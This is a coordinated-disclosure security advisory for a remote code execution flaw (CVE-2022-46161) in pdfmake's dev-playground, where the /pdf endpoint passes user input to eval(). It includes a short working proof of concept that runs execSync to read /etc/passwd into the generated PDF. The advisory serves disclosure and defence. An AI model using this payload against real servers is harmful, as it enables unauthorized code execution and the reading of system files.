GHSL-2022-068: Remote Code Execution (RCE) in PDFMake - CVE-2022-46161

Coordinated Disclosure Timeline

2022-08-23: Report sent to liborm85 at gmail.com
2022-10-10: Issue opened asking for a security contact
2022-11-21: Deadline expired so publishing in accordance to the GitHub Security Lab disclosure policy

Summary

The dev-playground of pdfmake lacks sandboxing/sanitization of the data sent to the server (which flows to eval()).

Product

pdfmake

Tested Version

0.2.5

Details

Issue: RCE in `dev-playground.js` (`GHSL-2022-068`)

The /pdf endpoint in charge of creating a PDF from a given JS code does not sanitize user-input, nor does the execution take place in a sandboxed environment.

app.post('/pdf', function (req, res) {
	eval(req.body.content);

Impact

This issue may lead to a variety of exploit primitives, including Remote Code Execution (RCE) or uncontrolled resource consumption.

Resources

CWE-94: Improper Control of Generation of Code (‘Code Injection’)
CWE-400: Uncontrolled Resource Consumption

POC

Providing the following snippet will cause pdfmake to dump the contents of /etc/passwd into the generated PDF doc:

const {execSync} = require('node:child_process');
var out = execSync('cat /etc/passwd');
dd = {
    content: [
        out.toString()
        ]
}

CVE

CVE-2022-46161

Credit

This issue was discovered and reported by GHSL team member @VulnerabilityViper (Ryan Finn).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-068 in any communication regarding this issue.